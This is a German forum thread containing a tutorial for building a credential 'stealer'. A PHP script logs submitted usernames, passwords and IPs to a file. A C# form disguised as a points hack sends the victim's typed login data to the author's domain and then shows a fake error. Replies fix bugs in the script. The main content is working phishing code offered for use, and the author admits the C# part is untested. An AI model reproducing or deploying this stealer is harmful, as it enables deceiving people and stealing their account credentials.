1. #1
    Avatar von rVs14
    Registriert seit
    18.11.2011
    Beiträge
    985
    Thanked 513 Times in 338 Posts

    Standard [Tutorial] Stealer (C# + PHP) #1

    Hallo,

    In diesem Tutorial möchte ich euch zeigen wie ihr in Verbindung von PHP sowie C# euren eigenen Stealer programmieren könnt.

    Vorraussetzungen
    • C# IDE
    • kleine PHP Vorkenntnisse
    • Geduld


    PHP
    Zu aller erst widmen wir uns dem PHP Script welches ziemlich Simpel ist, entweder machen wir es über eine Datenbank (finde ich persönlich besser) oder über eine Textdatei. Ich werde in diesem Thread 2 Tutorials verfassen, und dazu kommt noch ein Thread mit einem Control Panel um die Einträge zu verwalten.
    Jedoch benutzen wir zuerst die Textdatei Methode.

    Dafür erstellen wir uns ein PHP Dokument. Nun müssen wir uns Gedanken darüber machen, wie wir diese ganzen Daten übergeben können. Ganz einfach, wir übergeben 2 Parameter über $_GET (PHP: $_GET - Manual). Das heißt unsere Adresse ist dann etwa so aufgebaut: http://meinedomain.com/script.php?user=peter&pw=klausi . Nachdem unser Script das empfangen hat, speichert es die Parameter in Variablen, öffnet die Textdatei und schreibt es rein.

    PHP-Code:
    <?php 
    $username 
    $_GET['user'];
    $pass $_GET['pw'];
    $ip $_SERVER['REMOTE_ADDR'];
    if(
    $username == null || $pass == null) {
    echo 
    "Fail 01";
    exit();
    }else{
    $filehandler fopen("data.txt""a");
    $content $username.":".$pass.":".$ip."\r\n";
    fwrite($filehandler$content);
    fclose($filehandler);
    }
    ?>
    Zu aller erst deklaieren wir 3 Variablen ($username, $pass, $ip), und füllen diese mit Werten. Danach schauen wir das die Werte nicht vorhanden sind, wenn sie nicht vorhanden sind, brechen wir das Script ab und geben eine Fehlermeldung aus. Wenn die 2 Werte nicht leer sind, dann kommt das else (=oder) und erstellen wieder eine neue Variable namens: $filehandler. Diese füllen wir mit einen fopen(PHP: fopen - Manual ). Dort haben wir 2 Parameter übergeben, zum einen den File-Path sowie die Methode. Das ist jedoch auf der der Seite: fopen genau beschrieben, unter dem Punkt: mode. Nun fragt ihr euch sicherlich, warum dafür eine Variable? Der Grund ist ganz einfach: wir müssen es gleich bei fwrite als Parameter übergeben. Nun kommt die Variable $content, diese ist meiner Meinung nach einfach zu verstehen. Wir verketten den Usernamen, das Password, die IP und am Ende ein Zeilenumbruch(\r\n) . Als Trennzeichen benutzen wir einen Doppelpunkt. Nun kommen wir zum fwrite, dort übergeben wir wieder 2 Parameter, zum einen der Handler($filehandler) und den Content($content). Und zu guter letzt, rufen wir fclose auf und übergeben dort wieder den Handler($filehandler). So das war auch der PHP Part. Hier möchte ich jedoch erwähnen, dass man das Script so oft aufrufen kann wie man will, das heißt man kann die ganze Textdatei zuspammen, wir bauen später einen Spamschutz ein, oder wir nutzen die MySQL Variante wo soetwas garnicht erst passiert.


    C#

    Nunja, kommen wir zum kleinen C# Part, mal wieder müssen wir uns überlegen wie wir die Sache angehen. Ganz einfach, wir erstellen ein neues Projekt mit einer Form oder Console. Also erstellen wir uns eine typische Stealerform, 3 Labels, 2 Textboxen, 2 Radiobuttons und 1 Button.
    Label1 = Username
    Label2 = Passwort
    Label3 = Punkteauswahl
    Radiobutton1 = 30000
    Radiobutton2 = 80000
    Button1 = Hack

    Nun platziert ihr noch alles so wie es euch gefällt, hierbei ist aber wichtig das Textbox1 vor dem Username Label und Textbox2 vor dem Passwort Label steht.
    Zu erst fügt ihr 2 neue Usingdirektive hinzu: using System.Net.WebClient; und using Sytstem.Threading
    Nun macht ihr einen doppelklick auf den Hack-Button und schreibt dort folgenden Code:
    PHP-Code:
    WebClient client = new WebClient();
    String qt client.DownloadString("http://meinedomain.com/script.php?user=" textbox1.Text "&pw=" textbox2.Text);
    Thread.Sleep(2000);
    Messagebox.Show("Ups, es ist ein Fehler aufgetreten, bitte starte das Programm neu!"); 
    Das ist wohl noch simpler als der PHP Part, von da her gibt es hier auch nicht so viel zu erklären.
    Zuerst erstellen wir eine neue WebClient-Instanz, welche wir gleich danach benutzen. Dann erstellen wir einen String, welcher den Quelltext unserer Stealerseite aufruft, das wollen wir garnicht, wir wollen nur das unser Programm die URL aufruft und übergibt dabei die beiden Parameter, welche aus den Textboxen bezogen werden. Dies geht zwar wahrscheinlich mit Webrequest schneller, jedoch reicht die Methode völlig aus. Danach lassen wir das Programm 20 Sekunden warten, und dann gibt es die Meldung aus.

    Zu aller letzt möchte ich noch sagen, dass diese Stealer illegal sind und nur zu Testzwecken verwendet dürfen. Für alles andere hafte ich nicht.
    Dieses Tutorial dient ausdrücklich zum Lerneffekt!


    PS: Falls Fehler auftreten, sagt mir das bitte hier im Thread. Zudem konnte ich den C# Sourcecode nicht überprüfen da ich C# z.Z nicht auf dem PC habe, der Code ist aus dem Kopf geschrieben. Achja für die oberschlauen(), ich hab mir nicht die anderen Methoden von der Webclient Klasse durchgelesen, daher ist das mit DownloadString wahrscheinlich Quatsch aber es klappt .

    Nächstes Tutorial: Absicherung des Scripts für die Verwendung von MySQL.
    Geändert von rVs14 (20.07.2012 um 09:04 Uhr)

  2. The Following User Says Thank You to rVs14 For This Useful Post:

    UnReal (16.03.2015)

  3. #2
    Avatar von iToxic
    Registriert seit
    18.11.2011
    Beiträge
    918
    Thanked 1.773 Times in 913 Posts

    Standard AW: [Tutorial] Stealer (C# + PHP) #1

    Stimmt so nicht, so bekommt man immer Fail 01 angezeigt.
    Entweder man ändert es im PHP Script > user zu name
    oder halt in der URL name zu user



    edit

    Wobei man auch im PHP Script:
    if($username == "" || $pass == "") {
    durch:
    if($username == null || $pass == null) {
    oder
    if(!$username || !$pass) {
    ersetzen kann
    Geändert von iToxic (19.07.2012 um 21:47 Uhr)


  4. The Following User Says Thank You to iToxic For This Useful Post:

    rVs14 (19.07.2012)

  5. #3
    Avatar von rVs14
    Registriert seit
    18.11.2011
    Beiträge
    985
    Thanked 513 Times in 338 Posts

    Standard AW: [Tutorial] Stealer (C# + PHP) #1

    Zitat Zitat von #Supreme Beitrag anzeigen
    Stimmt so nicht, so bekommt man immer Fail 01 angezeigt.[...]
    Danke, war etwas im Zeitdruck beim schreiben des Tutorials. Deine Methode mit null ist besser, danke für den Tipp!
    Geändert von Nachto (19.07.2012 um 22:20 Uhr)

Ähnliche Themen

  1. Verschenke Steam-Acc Stealer in VB
    Von Elicsan im Forum Verschenke
    Antworten: 5
    Letzter Beitrag: 21.11.2012, 23:46
  2. Antworten: 1
    Letzter Beitrag: 20.07.2012, 20:13
Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.